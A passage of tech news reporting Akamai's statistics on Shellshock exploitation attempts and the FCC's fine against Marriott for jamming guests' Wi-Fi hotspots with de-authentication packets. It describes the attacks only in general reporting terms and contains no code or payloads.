Ory Segal wrote in a co-authored post.
"One
of the troubling aspects of the Shellshock vulnerability is the ease of
exploitation, which can be seen by the dramatic increase in the number
of unique payloads between the first and the second days," they said.
"The
sheer number of creative payloads also demonstrates how effective and
deadly this vulnerability can be – most of the scanning and exploitation
process is already fully automated.
"With such a low barrier to
entry, and the simplicity of writing powerful exploits, we believe that
Shellshock-based attacks are going to stay around for months if not
years, and will probably top the botnet infection method charts in the
near future."
Two-thirds of the 22,487 unique attacking IP addresses were
from the US, with Germany, Britain and seven other countries sharing the
remainder.
Almost 300,000 gaming domains made up the vast
majority of Shellshock targets, with consumer electronics, email
marketing among the less affected industries.
More than half of
all detected Shellshock probes however were illegitimate scans of the
sort conducted in unpaid security research which did not involve
exploitation, while about a third were legit.
Akamai found eight percent of payloads were attempts by
internet idiots to exploit Shellshock to open CD trays, play audio
files, and dump nonsensical payloads.
More malicious acts including Bitcoin and database stealers made up less than one percent of payloads.
Marriott has been fined $600,000 by the FCC for paralyzing guests'
personal Wi-Fi hotspots, forcing them to use the hotel giant's expensive
network instead.
The US watchdog today said the Marriott Gaylord
Opryland in Nashville, Tennessee, used equipment to illegally boot hotel
and convention center guests off their own networks, which were
typically smartphone hotspots.
Meanwhile, Marriott managers encouraged everyone to connect to the
hotel's Wi-Fi network, which cost from $250 to $1,000 to access.
According to the commission, the Gaylord Opryland installed an Allot NetEnforcer, and configured it to continually flood the surrounding ether with de-authentication packets.
An attacker does not have to know a Wi-Fi network's password, or be
authenticated in any way, to send a successful de-auth packet. All
devices and computers that receive the management frame over the air are
instructed to disassociate from their network.
Essentially, it was virtually impossible to use Wi-Fi, unless it was the Marriott's.
"It
is unacceptable for any hotel to intentionally disable personal
hotspots while also charging consumers and small businesses high fees to
use the hotel’s own Wi-Fi network," said FCC enforcement bureau chief Travis LeBlanc.
"This
practice puts consumers in the untenable position of either paying
twice for the same service or forgoing internet access altogether."
The fine is part of a consent decree [PDF]
Marriott has signed in order to end the watchdog's investigation into
Wi-Fi jamming. Marriott has also agreed to send a report on its Wi-Fi
"containment functionality" tools to the commission.
Allott
Communications, which makes the NetEnforcer hardware used by Marriott,
did not respond to a request for comment on the matter. It markets the
devices as "purpose-built appliances for monitoring and managing data
traffic on enterprise, cloud and broadband service provider networks."
Allott
has boasted that it provides network services to the Gaylord Opryland
as well Gaylord hotels in Florida, Texas and Maryland.
"In each of
the facilities, dedicated internet service is provided by a Gigabit
fiber-optic backbone with 100 megabit edge connections for meeting
rooms, ballrooms and exhibit hall space," the company writes [PDF].
"Each resort provides an always-up installation that serves thousands of internet users every day of the year."
Thousands of users ... willing or not, it seems.